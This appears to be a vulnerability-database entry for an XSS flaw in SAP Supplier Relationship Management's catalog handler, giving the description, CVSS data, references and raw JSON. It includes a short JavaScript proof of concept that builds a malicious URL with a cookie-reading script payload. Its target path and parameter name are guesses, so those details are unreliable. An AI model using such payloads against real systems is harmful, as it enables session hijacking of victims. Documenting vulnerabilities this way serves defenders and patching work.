Security Vulnerability Report
CVE-2026-0512 CVSS 6.1 MEDIUM

Published: 2026-04-14 00:16:04
Last Modified: 2026-04-17 15:18:17

Description

Due to a Cross-Site Scripting (XSS) vulnerability in SAP Supplier Relationship Management (the SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Supplier Relationship Management (SRM) (for the specific affected versions, refer to SAP Note 3645228)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// Proof of Concept for CVE-2026-0512
// Target: SAP SRM Catalog SICF Handler
// Description: Demonstrates how a malicious payload can be injected via URL.

// 1. Construct the base URL of the vulnerable SAP SRM Catalog handler
var targetUrl = "https://[target-host]/sap/bc/webdynpro_abap/srm_cat_handler/";

// 2. Define the malicious JavaScript payload
// This payload simply alerts the document cookie to demonstrate execution
var xssPayload = "<img src=x onerror=alert(document.cookie)>";

// 3. Inject the payload into a vulnerable parameter (e.g., 'input_data' or similar)
// Note: The specific parameter name depends on the actual implementation details found in the SAP Handler
var exploitUrl = targetUrl + "?vulnerable_param=" + encodeURIComponent(xssPayload);

// Output the generated malicious link
console.log("[+] Generated Malicious URL:");
console.log(exploitUrl);

// 4. If a victim clicks the link, the script executes in the context of the victim's browser session.

References

https://me.sap.com/notes/3645228
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0512",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T00:16:03.700",
    "lastModified": "2026-04-17T15:18:16.507",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3645228",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}